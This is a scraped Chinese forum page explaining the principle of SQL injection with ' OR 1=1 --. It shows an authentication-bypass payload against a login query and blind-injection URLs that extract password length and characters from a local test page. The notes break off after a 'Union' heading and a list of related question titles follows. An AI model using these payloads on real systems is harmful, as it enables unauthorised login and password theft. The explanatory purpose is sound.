sql注入 or 1=1的原理 什么？

一楼明显是COPY一族啊，呵呵

举个最简单的例子

后台管理员登陆判断最常见的语句，如果不加任何过滤就是下面这种

SELECT * FROM [ADMIN] WHERE USERNAME='ADMIN' AND USERPWD='ADMIN'

如果我在提交USERNAME的文本框里输入' OR 1=1 --

楼主看看会出现什么语句

SELECT * FROM [ADMIN] WHERE USERNAME='' OR 1=1 --' AND USERPWD='ADMIN'

当然是这种。怎么样，明白了没？

SQL注入的重点就是构造SQL语句，只有灵活的运用SQL
语句才能构造出牛比的注入字符串。学完之后写了点笔记，已备随时使用。希望你在看下面内容时先了
解SQL的基本原理。笔记中的代码来自网络。
===基础部分===
本表查询：
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

Union联合语句：
求注入的原理.? 为什么and 1=1,1=2就能判断能否SQL注入呢? SQL注入and 1 =1 和 and 1=2 是利用了什么? 怎样使用经典的“and 1=1、and 1=2”判断是否能进行SQL漏洞注入？（越详细越好！） 谁有好点的防SQL注入的代码 关于防止SQL注入的问题 简述SQL注入漏洞的防御方法 SQL防注入的符号有哪些 请教，关于防止SQL注入的问题？ sql and or 的问题